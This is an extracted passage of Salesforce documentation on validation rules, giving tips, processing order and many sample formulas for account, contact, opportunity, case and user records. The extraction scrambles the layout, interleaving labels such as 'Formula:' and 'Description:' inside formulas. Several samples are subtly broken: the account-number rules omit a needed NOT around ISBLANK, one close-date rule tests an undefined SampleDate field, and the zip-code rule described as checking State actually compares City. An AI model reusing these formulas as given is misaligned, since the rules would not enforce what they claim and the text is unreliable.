• Consider all the settings in your organization that can make a record fail validation, including assignment rules, field
updates, field-level security, or fields hidden on a page layout.

• Be careful not to create contradicting validation rules for the same field; otherwise, users won’t be able to save the record.

Tip:  A poorly designed validation rule can prevent users from saving valid data. Make sure you thoroughly test
a validation rule before activating it. You can also use the debug log to monitor the details of your rule
implementation.

• When referencing related fields in a validation formula, make sure those objects are deployed.

• Use the RecordType.Id merge field in your formula to apply different validations for different record types.

• You don’t have to begin a validation rule formula with the IF function. Any Boolean error condition expression works.
For example:

◊ Correct: CloseDate < TODAY()

◊ Incorrect: IF(CloseDate < TODAY(), TRUE, FALSE)

• Keep in mind that when a validation rule contains the BEGINS or CONTAINS function, it processes blank fields as
valid. For example, if you have a validation rule that tests whether the serial number of an asset begins with “3”, all assets
with a blank serial number are considered valid.

• When using a validation rule to ensure that a number field contains a specific value, use the ISNULL function to include
fields that do not contain any value. For example, to validate that a custom field contains a value of '1', use the following
validation rule to display an error if the field is blank or any other number:

OR(ISNULL(field__c), field__c<>1)

• Avoid using the IsClosed or IsWon opportunity merge fields in validation formulas. Instead, use the ISPICKVAL
function to determine if the Stage contains the appropriate value. For example, the following validation formula makes
a custom Project Start Date field required whenever the Stage is “Closed Won”:

AND(ISPICKVAL(StageName, "Closed Won"),
ISNULL(Project_Start_Date__c))

• Simplify your validation formulas by using checkbox fields, which don't require any operator because they return true or
false. For example, the following validation formula checks to be sure an opportunity has opportunity products using the
HasOpportunityLineItem merge field before users can save a change to it:

NOT(OR(ISNEW(),HasOpportunityLineItem))

Tips for Writing Validation Rule Error Messages

• Give instructions. An error message like “invalid entry” doesn’t tell the user what type of entry is valid. Write something
more specific, such as “Close Date must be after today.”
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• Always include the field label. Users might not know what field is failing validation, especially if the error message appears
at the top of the page.

Note:  When defining validation rules, you can set the error location to Top of Page or Field. If the error
location is set to a field that is later deleted, to a field that is read only, or to a field that isn’t visible on the page
layout, Salesforce automatically changes the location to Top of Page.

• If you have a multilingual organization, translate your error messages. You can translate error messages using the Translation
Workbench.

• Assign corresponding numbers to validation rules and their error messages. This allows you to identify the source of the
error.

See Also:
Defining Validation Rules
Validation Rule Considerations

Validation Rule Considerations

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, Developer, and Database.com Editions

Validation rules verify that the data a user enters in a record meets the standards you specify before the user can save the record.
A validation rule can contain a formula or expression that evaluates the data in one or more fields and returns a value of “True”
or “False”. Validation rules also include an error message to display to the user when the rule returns a value of “True” due to
an invalid value. Review these considerations before implementing validation rules in your organization.

How Salesforce Processes Validation Rules

Salesforce processes rules in the following order:

1. Validation rules
2. Assignment rules
3. Auto-response rules
4. Workflow rules (with immediate actions)
5. Escalation rules

In addition:

• When one validation rule fails, Salesforce continues to check any additional validation rules on that field or any other field
on the page and displays all appropriate error messages at once.

• If validation rules exist for activities and you create an activity during lead conversion, the lead converts but a task isn’t
created.

• Validation rules are only enforced during lead conversion if validation and triggers for lead conversion are enabled in your
organization.

• Campaign hierarchies ignore validation rules.
• Salesforce runs validation rules before creating records submitted via Web-to-Lead and Web-to-Case, and only creates

records that have valid values.
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• Validation rules continue to run on individual records if the owner is changed. If the Mass Transfer tool is used to change
the ownership of multiple records, however, validation rules won’t run on those records.

Validation Rule Field Restrictions

Validation rule formulas don’t or can’t refer to:

• Compound fields, including addresses, first and last names, and dependent picklists and lookups
• Campaign statistic fields, including statistics for individual campaigns and campaign hierarchies
• Merge fields for auto-number or compound address fields such as Mailing Address

Note:  Merge fields for individual address fields, such as Billing City, are OK to use in validation rule formulas.

In addition, validation rules behave like this with regard to other fields and functions in Salesforce:

• The detail page of a custom activity field doesn't list associated validation rules.
• Because updates to records based on workflow rules don’t trigger validation rules, workflow rules can invalidate previously

valid fields.
• You can’t create validation rules for relationship group members.
• Because roll-up summary fields aren’t displayed on edit pages, you can use them in validation rules, but not as the error

location.

Lookup Filters vs. Validation Rules

Validation rules and lookup filters achieve similar ends, but offer different advantages. Use a lookup filter if:

• You want to improve user efficiency by limiting the number of available options in a lookup search dialog.
• You want to improve user efficiency by automating filters on lookup search dialogs that your users manually set.

Use a validation rule if:

• You're close to the maximum number of lookup filters allowed.
• You must implement a complex business rule that requires you to use a formula. Formulas can reference fields that basic

filter criteria can't reference, such as fields on the parent of the source object. Formulas can also use functions. For example,
use ISNEW if the rule should only apply on record creation, or ISCHANGED if the rule should apply when a field changes.

See Also:
Defining Validation Rules
Activating Validation Rules
Examples of Validation Rules
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Examples of Validation Rules

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“View Setup and Configuration”To view field validation rules:

“Customize Application”To define or change field validation rules:

Use the following samples for validation rules in Salesforce and Force.com AppExchange apps, including:

• Account Validation Rules

• Contact Validation Rules

• Opportunity Management Validation Rules

• Quote Validation Rules

• Call Center Validation Rules

• User, Role, and Profile Validation Rules

• Account Address Validation Rules

• Date Validation Rules

• Number Validation Rules

• Cross Object Validation Rules

• Community Validation Rules (Answers and Ideas)

• Other Validation Rules

For more information on any of the formula functions used in these examples, see Formula Operators and Functions

See Also:
About Validation Rules
Defining Validation Rules

Account Address Validation Rules

Canadian Billing Postal Code

ValueField

Validates that the account Billing Zip/Postal Code is in the correct format if
Billing Country is Canada.

Description:

AND(
OR(BillingCountry = "CAN", BillingCountry = "CA", BillingCountry

Formula:

= "Canada"),
NOT(REGEX(BillingPostalCode,
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ValueField

"((?i)[ABCEGHJKLMNPRSTVXY]\\d[A-Z]?\\s?\\d[A-Z]\\d)?"))
)

Canadian postal code must be in A9A 9A9 format.Error Message:

Billing Zip/Postal CodeError Location:

Billing Zip Code Is in Billing State

ValueField

Validates that the account Billing Zip/Postal Code is valid by looking up the
first five characters of the value in a custom object called Zip_Code__c that contains a

Description:

record for every valid zip code in the US. If the zip code is not found in the Zip_Code__c
object, or the Billing State does not match the corresponding State_Code__c in
the Zip_Code__c object, an error is displayed.

VLOOKUP(
$ObjectType.Zip_Code__c.Fields.City__c ,

Formula:

$ObjectType.Zip_Code__c.Fields.Name ,
LEFT(BillingPostalCode,5)) <> BillingCity

Billing Zip Code does not exist in specified Billing State.Error Message:

Billing Zip/Postal CodeError Location:

US Billing Zip Code

ValueField

Validates that the account Billing Zip/Postal Code is in 99999 or 99999-9999
format if Billing Country is USA or US.

Description:

AND(
OR(BillingCountry = "USA", BillingCountry = "US"),

Formula:

NOT(REGEX(BillingPostalCode, "\\d{5}(-\\d{4})?"))
)

Note:  This example uses the REGEX function; see Shipping Zip Code on
page 2975 if you are not familiar with regular expressions.

Zip code must be in 99999 or 99999-9999 format.Error Message:

Billing Zip/Postal CodeError Location:
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Shipping Zip Code

ValueField

Validates that the account Shipping Zip/Postal Code is in 99999 or 99999-9999 format
if Shipping Country is USA or blank.

Description:

AND(
OR(ShippingCountry = "USA", ISBLANK(ShippingCountry)),

Formula:

OR(
AND(LEN(ShippingPostalCode) <>5,

LEN(ShippingPostalCode) <> 10),
NOT(CONTAINS("0123456789",

LEFT( ShippingPostalCode, 1))),
NOT(CONTAINS("0123456789",

MID( ShippingPostalCode , 2, 1))),
NOT(CONTAINS("0123456789",

MID( ShippingPostalCode , 3, 1))),
NOT(CONTAINS("0123456789",

MID( ShippingPostalCode , 4, 1))),
NOT(CONTAINS("0123456789",

MID( ShippingPostalCode , 5, 1))),
AND(
LEN(ShippingPostalCode) = 10,
OR(
MID( ShippingPostalCode , 6, 1) <> "-",
NOT(CONTAINS("0123456789",
MID( ShippingPostalCode , 7, 1))),

NOT(CONTAINS("0123456789",
MID( ShippingPostalCode , 8, 1))),

NOT(CONTAINS("0123456789",
MID( ShippingPostalCode , 9, 1))),

NOT(CONTAINS("0123456789",
MID( ShippingPostalCode , 10, 1)))

)
)
)
)

Note:  This example interprets a blank country as US. To use this example with other
countries, remove the clause that checks the length of the country field. Also, validation
rule criteria are case sensitive, so this rule is only enforced when the country is blank
or “USA” in all capital letters. The rule is not enforced when the country is “usa.”

Tip:  You can also validate zip codes using a regular expression; for an example of a
formula using a regular expression, see REGEX on page 3075.

Zip code must be in 99999 or 99999-9999 format.Error Message:

Shipping Zip/Postal CodeError Location:

Valid Billing State (US)

ValueField

Validates that the account Billing State/Province is a valid two-character
abbreviation if Billing Country is US, USA, or blank.

Description:
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ValueField

AND (
OR(BillingCountry = "US", BillingCountry="USA",

Formula:

ISBLANK(BillingCountry)),
OR(
LEN(BillingState) < 2,
NOT(
CONTAINS("AL:AK:AZ:AR:CA:CO:CT:DE:DC:FL:GA:HI:ID:" &
"IL:IN:IA:KS:KY:LA:ME:MD:MA:MI:MN:MS:MO:MT:NE:NV:NH:" &
"NJ:NM:NY:NC:ND:OH:OK:OR:PA:RI:SC:SD:TN:TX:UT:VT:VA:" &
"WA:WV:WI:WY", BillingState)
)))

Note:  This example interprets a blank country as US. To use this example
with other countries, remove the clause that checks the length of the country
field. Also, validation rule criteria are case sensitive, so this rule is only enforced
when the country is blank or “USA” in all capital letters. The rule is not
enforced when the country is “usa.”

A valid two-letter state code is required.Error Message:

Billing State/ProvinceError Location:

Valid Billing Province (Canada)

ValueField

Validates that the account Billing State/Province is a valid two-character abbreviation if
Billing Country is CA or CAN.

Description:

AND (
OR(BillingCountry = "CA", BillingCountry="CAN"),

Formula:

OR(
LEN(BillingState) < 2,
NOT(

CONTAINS("AB:BC:MB:NB:NL:NT:NS:NU:ON:PC:QC:SK:YT", BillingState)
)))

A valid two-letter province code is required.Error Message:

Billing State/ProvinceError Location:

Valid Shipping State

ValueField

Validates that the account Shipping State/Province is a valid two-character abbreviation if
Shipping Country is US, USA, or blank.

Description:

AND (
OR(ShippingCountry = "US", ShippingCountry="USA",

Formula:

ISBLANK(ShippingCountry)),
OR(
LEN(ShippingState) < 2,
NOT(
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ValueField

CONTAINS("AL:AK:AZ:AR:CA:CO:CT:DE:DC:FL:GA:HI:ID:" &
"IL:IN:IA:KS:KY:LA:ME:MD:MA:MI:MN:MS:MO:MT:NE:NV:NH:" &
"NJ:NM:NY:NC:ND:OH:OK:OR:PA:RI:SC:SD:TN:TX:UT:VT:VA:" &
"WA:WV:WI:WY", ShippingState)
)))

Note:  This example interprets a blank country as US. To use this example with other
countries, remove the clause that checks the length of the country field. Also, validation rule
criteria are case sensitive, so this rule is only enforced when the country is blank or “USA”
in all capital letters. The rule is not enforced when the country is “usa.”

A valid two-letter state abbreviation is required.Error Message:

Shipping State/ProvinceError Location:

Valid Shipping Province (Canada)

ValueField

Validates that the account Shipping State/Province is a valid two-character abbreviation, if
Billing Country is CA or CAN.

Description:

AND (
OR(ShippingCountry = "CA", ShippingCountry="CAN"),

Formula:

OR(
LEN(ShippingState) < 2,
NOT(
CONTAINS("AB:BC:MB:NB:NL:NT:NS:NU:ON:PC:QC:SK:YT", ShippingState)
)))

A valid two-letter province abbreviation is required.Error Message:

Shipping State/ProvinceError Location:

Valid Billing Country

ValueField

Validates that the account Billing Country is a valid ISO 3166 two-letter code.Description:

OR(
LEN(BillingCountry) = 1,

Formula:

NOT(
CONTAINS(
"AF:AX:AL:DZ:AS:AD:AO:AI:AQ:AG:AR:AM:" &
"AW:AU:AZ:BS:BH:BD:BB:BY:BE:BZ:BJ:BM:BT:BO:" &
"BA:BW:BV:BR:IO:BN:BG:BF:BI:KH:CM:CA:CV:KY:" &
"CF:TD:CL:CN:CX:CC:CO:KM:CG:CD:CK:CR:CI:HR:" &
"CU:CY:CZ:DK:DJ:DM:DO:EC:EG:SV:GQ:ER:EE:ET:FK:" &
"FO:FJ:FI:FR:GF:PF:TF:GA:GM:GE:DE:GH:GI:GR:GL:" &
"GD:GP:GU:GT:GG:GN:GW:GY:HT:HM:VA:HN:HK:HU:" &
"IS:IN:ID:IR:IQ:IE:IM:IL:IT:JM:JP:JE:JO:KZ:KE:KI:" &
"KP:KR:KW:KG:LA:LV:LB:LS:LR:LY:LI:LT:LU:MO:MK:" &
"MG:MW:MY:MV:ML:MT:MH:MQ:MR:MU:YT:MX:FM:MD:MC:" &
"MC:MN:ME:MS:MA:MZ:MM:MA:NR:NP:NL:AN:NC:NZ:NI:" &
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ValueField

"NE:NG:NU:NF:MP:NO:OM:PK:PW:PS:PA:PG:PY:PE:PH:" &
"PN:PL:PT:PR:QA:RE:RO:RU:RW:SH:KN:LC:PM:VC:WS:" &
"SM:ST:SA:SN:RS:SC:SL:SG:SK:SI:SB:SO:ZA:GS:ES:" &
"LK:SD:SR:SJ:SZ:SE:CH:SY:TW:TJ:TZ:TH:TL:TG:TK:" &
"TO:TT:TN:TR:TM:TC:TV:UG:UA:AE:GB:US:UM:UY:UZ:" &
"VU:VE:VN:VG:VI:WF:EH:YE:ZM:ZW",
BillingCountry)))

A valid two-letter country code is required.Error Message:

Billing CountryError Location:

Account Validation Rules

Account Number Is Numeric

ValueField

Validates that the Account Number is numeric if not blank.Description:

AND(
ISBLANK(AccountNumber),

Formula:

NOT(ISNUMBER(AccountNumber))
)

Account Number is not numeric.Error Message:

Account NumberError Location:

Account Number Length

ValueField

Validates that the Account Number is exactly seven digits (if it is not blank). The
number seven is simply illustrative. You can change this to any number you like.

Description:

AND(
ISBLANK(AccountNumber),

Formula:

LEN(AccountNumber) <> 7
)

Account Number must be seven digits.Error Message:

Account NumberError Location:
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Annual Revenue Range

ValueField

Validates that the account Annual Revenue is not negative and does not exceed $100
billion. This limit is designed to catch typos.

Description:

OR(
AnnualRevenue < 0,

Formula:

AnnualRevenue > 100000000000
)

Annual Revenue cannot exceed 100 billion.Error Message:

Annual RevenueError Location:

Number Validation Rules

Time Cards Must Total 40 Hours

ValueField

Ensures that users cannot save a time card record with more than 40 hours in a work
week. This example requires five custom fields on your custom object, one for each day
of work.

Description:

Monday_Hours__c +
Tuesday_Hours__c +

Formula:

Wednesday_Hours__c +
Thursday_Hours__c +
Friday_Hours__c > 40

Your total hours cannot exceed 40.Error Message:

Top of PageError Location:

Number Cannot Be Negative

ValueField

Validates that a custom field called Hours Worked is not a negative number.Description:

Hours_Worked__c < 0Formula:

Hours Worked cannot be less than zero.Error Message:

Hours WorkedError Location:
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Number Must Be Even

ValueField

Validates that a custom field called Ark Passengers is a non-negative even number.Description:

OR(
Ark_Passengers__c < 0,

Formula:

MOD( Ark_Passengers__c, 2) <> 0
)

Ark Passengers must be a positive even number.Error Message:

Ark PassengersError Location:

Number Must Be Odd

ValueField

Validates that a custom field called Socks Found is a non-negative odd number.Description:

OR(
Socks_Found__c < 0,

Formula:

MOD( Socks_Found__c, 2) = 0
)

Socks Found must be an odd number.Error Message:

Socks FoundError Location:

Number Must Be a Multiple of Five

ValueField

Validates that a custom field called Multiple of 5 is a multiple of five.Description:

MOD( Multiple_of_5__c, 5) <> 0Formula:

Number must be a multiple of five.Error Message:

Multiple of 5Error Location:

Number Must Be an Integer

ValueField

Validates that a custom field called My Integer is an integer.Description:

FLOOR( My_Integer__c) <> My_Integer__cFormula:

This field must be an integer.Error Message:

My IntegerError Location:
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Number Must Be Between -50 and 50

ValueField

Validates that a custom field called Volume is between -50 and 50.Description:

ABS( Volume__c) > 50Formula:

Volume must be between -50 and 50.Error Message:

VolumeError Location:

Number Range Validation

ValueField

Validates that the range between two custom fields, Salary Min and Salary Max,
is no greater than $20,000.

Description:

(Salary_Max__c - Salary_Min__c) > 20000Formula:

Salary range must be within $20,000. Adjust the Salary Max or Salary Min values.Error Message:

Salary MaxError Location:

Percentage Must Be Between Zero and 100

ValueField

Validates that a custom field called Mix Pct is between 0 and 100%. Note that percent
fields are expressed divided by 100 in formulas (100% is expressed as 1; 50% is expressed
as 0.5).

Description:

OR(
Mix_Pct__c > 1.0,

Formula:

Mix_Pct__c < 0.0
)

Mix Pct must be between 0 and 100%.Error Message:

Mix PctError Location:

Contact Validation Rules

Mailing Address Fields Are Required

ValueField

Validates that the contact Mailing Street, Mailing City, and Mailing Country
are provided.

Description:
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ValueField

OR(
ISBLANK( MailingStreet ),

Formula:

ISBLANK( MailingCity ),
ISBLANK( MailingCountry )

)

Mailing Street, City, and Country are required.Error Message:

Top of PageError Location:

Mailing Street Is Required

ValueField

Validates that the contact Mailing Street is provided.Description:

ISBLANK( MailingStreet )Formula:

Mailing Street is required.Error Message:

Mailing StreetError Location:

Mailing Zip Code

ValueField

Validates that the contact Mailing Zip/Postal Code is in 99999 or 99999-9999 format if
Mailing Country is USA or blank.

Description:

AND(
OR(MailingCountry = "USA", ISBLANK(MailingCountry)),

Formula:

OR(
AND(LEN(MailingPostalCode) <>5,
LEN(MailingPostalCode) <> 10),
NOT(CONTAINS("0123456789",

LEFT( MailingPostalCode, 1))),
NOT(CONTAINS("0123456789",

MID( MailingPostalCode , 2, 1))),
NOT(CONTAINS("0123456789",

MID( MailingPostalCode , 3, 1))),
NOT(CONTAINS("0123456789",

MID( MailingPostalCode , 4, 1))),
NOT(CONTAINS("0123456789",

MID( MailingPostalCode , 5, 1))),
AND(
LEN(MailingPostalCode) = 10,
OR(
MID( MailingPostalCode , 6, 1) <> "-",
NOT(CONTAINS("0123456789",
MID( MailingPostalCode , 7, 1))),

NOT(CONTAINS("0123456789",
MID( MailingPostalCode , 8, 1))),

NOT(CONTAINS("0123456789",
MID( MailingPostalCode , 9, 1))),

NOT(CONTAINS("0123456789",
MID( MailingPostalCode , 10, 1)))
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ValueField

)
)
)
)

Note:  This example interprets a blank country as US. To use this example with other
countries, remove the clause that checks the length of the country field. Also, validation
rule criteria are case sensitive, so this rule is only enforced when the country is blank
or “USA” in all capital letters. The rule is not enforced when the country is “usa.”

Tip:  You can also validate zip codes using a regular expression; for an example of a
formula using a regular expression, see REGEX on page 3075.

Zip code must be in 99999 or 99999-9999 format.Error Message:

Mailing Zip/Postal CodeError Location:

Phone Number Has International Format

ValueField

Validates that the Phone number begins with a plus sign (+) for country code. Note that
this validation rule conflicts with the ten-digit rule.

Description:

LEFT(Phone, 1) <> "+"Formula:

Phone number must begin with + (country code).Error Message:

PhoneError Location:

US Phone Number Has Ten Digits

ValueField

Validates that the Phone number is in (999) 999-9999 format. This works by using the
REGEX function to check that the number has ten digits in the (999) 999-9999 format.

Description:

NOT(REGEX(Phone, "\\D*?(\\d\\D*?){10}"))Formula:

US phone numbers should be in this format: (999) 999-9999.Error Message:

PhoneError Location:
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Date Validation Rules

Date Must Be a Weekday

ValueField

Validates that the value of a custom date field is a weekday (not Saturday or Sunday).Description:

CASE(MOD( My_Date__c - DATE(1900, 1, 7), 7),
0, 0,

Formula:

6, 0,
1) = 0

Date must be a weekday.Error Message:

My DateError Location:

Date Must Be a Weekend Day

ValueField

Validates that the value of a custom date field is a Saturday or Sunday.Description:

CASE( MOD( My_Date__c - DATE(1900, 1, 7), 7),
0, 1,

Formula:

6, 1,
0) = 0

Date must be a weekend day.Error Message:

My DateError Location:

Date Must Be in the Current Month

ValueField

Validates that a custom date field contains a date within the current month and year.Description:

OR (
YEAR( My_Date__c ) <> YEAR ( TODAY() ),

Formula:

MONTH( My_Date__c ) <> MONTH ( TODAY() )
)

Date must be in the current month.Error Message:

My DateError Location:

Date Must Be in the Current Year

ValueField

Validates that a custom date field contains a date within the current year.Description:
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ValueField

YEAR( My_Date__c ) <> YEAR ( TODAY() )Formula:

Date must be in the current year.Error Message:

My DateError Location:

Date Must Be the Last Day of the Month

ValueField

Validates whether a custom field called My Date is the last day of the month. To do
this, it determines the date of the first day of the next month and then subtracts 1 day.
It includes special case logic for December.

Description:

DAY(My_Date__c) <>
IF(Month(My_Date__c)=12, 31,
DAY(DATE(YEAR(My_Date__c),MONTH(My_Date__c)+1,1) - 1))

Formula:

Date must be the last day of the month.Error Message:

My DateError Location:

Date Must Be Within One Year of Today

ValueField

Validates whether a custom field called Follow-Up Date is within one year of today’s
date. This example assumes a 365 day year. (It does not handle leap years.)

Description:

Followup_Date__c - TODAY() > 365Formula:

Follow-Up Date must be within one year of today.Error Message:

Follow-Up DateError Location:

Day of Month Cannot Be Greater Than 15

ValueField

Validates that a custom field called Begin Date contains a date in the first 15 days of
the specified month.

Description:

DAY( Begin_Date__c ) > 15Formula:

Begin Date cannot be after the 15th day of month.Error Message:

Begin DateError Location:
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End Date Cannot Be Before Begin Date

ValueField

Validates that a custom field called End Date does not come before another custom
field called Begin Date.

Description:

Begin_Date__c > End_Date__cFormula:

End Date cannot be before Begin Date.Error Message:

Begin DateError Location:

Expiration Date Cannot Be Before Close Date

ValueField

Validates that a custom field called Expiration Date does not come before Close
Date.

Description:

Expiration_Date__c < CloseDateFormula:

Expiration Date cannot be before Close Date.Error Message:

Expiration DateError Location:

Opportunity Management Validation Rules

Conditionally-Required Field Based on Opportunity Stage

ValueField

Validates that a custom field called Delivery Date is provided if an opportunity has
advanced to the Closed Won or Negotiation/Review stage.

Description:

AND (
OR (

Formula:

ISPICKVAL(StageName, "Closed Won"),
ISPICKVAL(StageName, "Negotiation/Review")),

ISBLANK(Delivery_Date__c)
)

Delivery Date is required for this stage.Error Message:

Delivery DateError Location:
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Close Date Cannot Be Prior to Current Month

ValueField

Validates that the Close Date of an opportunity is not within a month prior to the
current month. Note the use of ISNEW and ISCHANGED in this formula to ensure

Description:

the condition is only checked when the opportunity is being created or the Close Date
field is modified subsequently.

AND(
OR (

Formula:

ISNEW(),
ISCHANGED( CloseDate )),

CloseDate < DATE( YEAR(TODAY()), MONTH(TODAY()), 1) )

Close Date cannot be prior to current month.Error Message:

Close DateError Location:

Close Date Must Be a Future Date

ValueField

Ensures that users do not change the Close Date of an opportunity to a day in the past.Description:

SampleDate < TODAY()Formula:

Close Date cannot be a day in the past.Error Message:

Close DateError Location:

Discounts on Opportunities

ValueField

Validates that a custom discount percent field is between 0 and 40%.Description:

OR(Discount_Rate__c < 0, Discount_Rate__c > 0.40)Formula:

The Discount Rate must not exceed 40%.Error Message:

Discount RateError Location:

High-Value Opportunity Must Be Approved Before Closed

ValueField

Opportunities with amounts greater than $50,000 require that a custom checkbox field
called Approved is checked in order to change the stage to Closed Won or Closed Lost.

Description:

To automate this, set field-level security on the Approved checkbox so that it can only
be checked via a custom approval process (Enterprise Edition or Unlimited Edition).

AND(
OR(

Formula:

ISPICKVAL(StageName,"Closed Won"),
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ValueField

ISPICKVAL(StageName,"Closed Lost")),
(Amount > 50000),
NOT(ISPICKVAL(Approval_Status__c ,"Approved")))

All high-value opportunities must be approved for closure. Click the Request Close
button.

Error Message:

Top of PageError Location:

Opportunity Amount Cannot Exceed $10 Million

ValueField

Validates that opportunity Amount is positive and no more than $10 million. This limit
is designed to catch typos.

Description:

OR(
Amount < 0,

Formula:

Amount > 10000000
)

Amount cannot exceed $10 million.Error Message:

AmountError Location:

Opportunity Check for Products

ValueField

Validates that an opportunity has at least one opportunity product before users can save a change
to an opportunity.

Description:

NOT(OR(ISNEW(),HasOpportunityLineItem))Formula:

You must add products to this opportunity before saving.Error Message:

Top of PageError Location:

Opportunity Must Have Products if Beyond “Needs Analysis” Stage

ValueField

Validates that an opportunity has opportunity products before the Stage can move
beyond Needs Analysis.

Description:

AND (
CASE( StageName,

Formula:

"Value Proposition", 1,
"Id. Decision Makers", 1,
"Perception Analysis", 1,
"Proposal/Price Quote", 1,
"Negotiation/Review", 1,
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ValueField

"Closed Won", 1,
0) = 1,

NOT(HasOpportunityLineItem)
)

Opportunity products are required to advance beyond the Needs Analysis stage.Error Message:

Top of PageError Location:

Opportunity Name Format

ValueField

Validates that an opportunity contains a hyphen as a way of enforcing an “[Account] -
[Amount]” opportunity naming convention.

Description:

FIND( " - ", Name ) = 0Formula:

Opportunity Name should use “[Account] - [Amount]” format.Error Message:

Opportunity NameError Location:

Prevent Sales Reps from Moving Opportunity Stage Backwards

ValueField

Prevent sales reps from changing opportunity Stage “backwards” to specific values, once
they have accepted the opportunity via a custom approval process. The approval process
sets the custom Accepted Flag checkbox to True.

Description:

AND(
Accepted_Flag__c,

Formula:

OR ( ISPICKVAL( StageName, "Stage 1"), ISPICKVAL( StageName,
"Stage 2"))
)

Invalid stage for accepted opportunity.Error Message:

StageError Location:

Probability Must Be 100% for Won Opportunities

ValueField

Validates that the probability of a won opportunity is properly set to 100%. This is useful
for data cleanliness and reporting purposes.

Description:

AND (
ISPICKVAL( StageName, "Closed Won"),
Probability <> 1)

Formula:
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ValueField

Probability must be 100% for won opportunities.Error Message:

ProbabilityError Location:

Probability Must Be Zero for Lost Opportunities

ValueField

Validates that the probability of a lost opportunity is properly set to zero. This is useful
for data cleanliness and reporting purposes.

Description:

AND (
ISPICKVAL( StageName, "Closed Lost"),
Probability <> 0)

Formula:

Probability must be 0% for lost opportunities.Error Message:

ProbabilityError Location:

Project Start Date

ValueField

Validates that a field is conditionally required based on the values of other fields. Use this
validation formula to ensure that users include a Project Start Date for an opportunity
that is closed/won.

Description:

AND(ISPICKVAL(StageName, "Closed Won"),
ISNULL(Project_Start_Date__c))

Formula:

Project start date is required for won opportunities.Error Message:

Project Start DateError Location:

Quote Validation Rules

Display Error if Quote Line Item Discount Exceeds 40%

ValueField

Shows an error if a quote line item's discount exceeds 40%.Description:

Discount > .40Formula:

The discount on this quote line item cannot exceed 40%.Error Message:

Discount on quoteError Location:
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Call Center Validation Rules

Conditionally Require Description When Case Reason is “Other”

ValueField

Validates that a custom field called Other Reason contains a value if a case has a Case
Reason of “Other.”

Description:

AND(
ISPICKVAL( Reason, "Other" ),

Formula:

ISBLANK(Other_Reason__c)
)

Description of Other Reason is required.Error Message:

Other ReasonError Location:

Prevent Open Cases from Being Reset to New

ValueField

If a case is already open, prevents the Status from being changed back to “New.”Description:

AND(
ISCHANGED( Status ),

Formula:

NOT(ISPICKVAL(PRIORVALUE( Status ), "New")),
ISPICKVAL( Status, "New")

)

Open case Status cannot be reset to New.Error Message:

StatusError Location:

Restrict Status of Re-Opened Cases

ValueField

Validates that the case Status is “Re-opened” when a closed case is opened again.Description:

AND(
ISCHANGED( Status ),

Formula:

OR(
ISPICKVAL(PRIORVALUE( Status ), "Closed"),
ISPICKVAL(PRIORVALUE( Status ),

"Closed in SSP")),
NOT( ISPICKVAL( Status, "Re-Opened"))

)

Closed case can only be changed to “Re-opened.”Error Message:

StatusError Location:
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Prevent Case Milestone Completion After Cases Are Closed

ValueField

Validates that a milestone's Completion Date can't occur after the case's Status is
Closed.

Description:

Case.IsClosed = trueFormula:

You can't complete a milestone after a case is closed.Error Message:

Top of PageError Location:

Prevent Case Milestone Completion Before Case Creation Dates

ValueField

Validates that the milestone's Completion Date has occurred after the case's
Date/Time Opened.

Description:

CompletionDate >= Case.CreatedDate && CompletionDate <=
Case.ClosedDate

Formula:

The milestone Completion Date must occur after the date the case was created and
before the case was closed.

Error Message:

Top of PageError Location:

User, Role, and Profile Validation Rules

Discount Percent Does Not Exceed Role-Based Limit

ValueField

Validates that a custom field on opportunities called Discount Percent does not
exceed a maximum value that varies depending on the user’s role. The default maximum
is 15%.

Description:

Discount_Percent__c >
VLOOKUP($ObjectType.Role_Limits__c.Fields.Limit__c,

Formula:

$ObjectType.Role_Limits__c.Fields.Name,
$UserRole.Name)

Discount (%) exceeds limit allowed for your role.Error Message:

Discount PercentError Location:
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Expense Amount Does Not Exceed User's Max Allowed Expense

ValueField

Validates a custom field called Expense Amount against a custom user field called Max
Allowed Expense.

Description:

Expense_Amount__c > $User.Max_Allowed_Expense__cFormula:

Amount cannot exceed your maximum allowed expense.Error Message:

Expense AmountError Location:

Only Record Owner Can Change Field

ValueField

Ensures that only the record owner can make changes to a custom field called Personal
Goal.

Description:

AND(
ISCHANGED( Personal_Goal__c ),

Formula:

Owner <> $User.Id
)

Only record owner can change Personal Goal.Error Message:

Personal GoalError Location:

Only Record Owner or Administrator Can Change Field

ValueField

Ensures that a user can make changes to a custom field called Personal Goal only if
the user is the record owner or has a custom profile of “Custom: System Admin.”

Description:

AND( ISCHANGED( Personal_Goal__c ), Owner <> $User.Id,
$Profile.Name <>

"Custom: System Admin" )

Formula:

Note:  $Profile merge fields are only available in Enterprise, Unlimited, and
Developer Editions.

Only record owner or administrator can change Personal Goal.Error Message:

Personal GoalError Location:
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Opportunity Close Date Can Only Be Back-Dated by Administrator

ValueField

Validates that the Close Date of an opportunity does not fall prior to the current
month, except for users who have a custom profile called “Custom: System Admin.”

Description:

AND(
OR (

Formula:

ISNEW(),
ISCHANGED( CloseDate )),

CloseDate < DATE( YEAR(TODAY()), MONTH(TODAY()), 1),
$Profile.Name <> "Custom: System Admin"

)

Note:  $Profile merge fields are only available in Enterprise, Unlimited, and
Developer Editions.

Close Date cannot be prior to current month.Error Message:

Close DateError Location:

Cross Object Validation Rules

Discounts Must Be Within Range

This example consists of three validation rules on opportunity products. The examples below work together to help you manage
discount amounts for products and require a custom percent field on opportunity products called Line Discount. The
examples below also require you to use price books and customize the Product Family field to include the following values:
Software, Consulting, and Training.

Software Discounts

ValueField

Prevents users from saving software products with a discount
over 10 percent.

Description:

AND(Line_Discount__c > 0.10,
ISPICKVAL(Product2.Family, "Software"))

Formula:

The discount must be 10% or less for software products.Error Message:

Line DiscountError Location:

Consulting Discounts

ValueField

Prevents users from saving consulting products with a discount
over 15 percent.

Description:
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ValueField

AND(Line_Discount__c > 0.15,
ISPICKVAL(Product2.Family, "Consulting"))

Formula:

The discount must be 15% or less for consulting products.Error Message:

Line DiscountError Location:

Training Discounts

ValueField

Prevents users from saving training products with a discount
over 20 percent.

Description:

AND(Line_Discount__c > 0.20,
ISPICKVAL(Product2.Family, "Training"))

Formula:

The discount must be 20% or less for training products.Error Message:

Line DiscountError Location:

Prevent Changing Opportunity Products on Closed Opportunities

This example consists of two validation rules: one on opportunity products and another on opportunities.

ValueField

Prevents users from editing opportunity products after an
opportunity is closed. Create the following validation rule
example on opportunity products.

Description:

OR(ISPICKVAL(Opportunity.StageName, "Closed
Won"), ISPICKVAL(Opportunity.StageName,
"Closed Lost"))

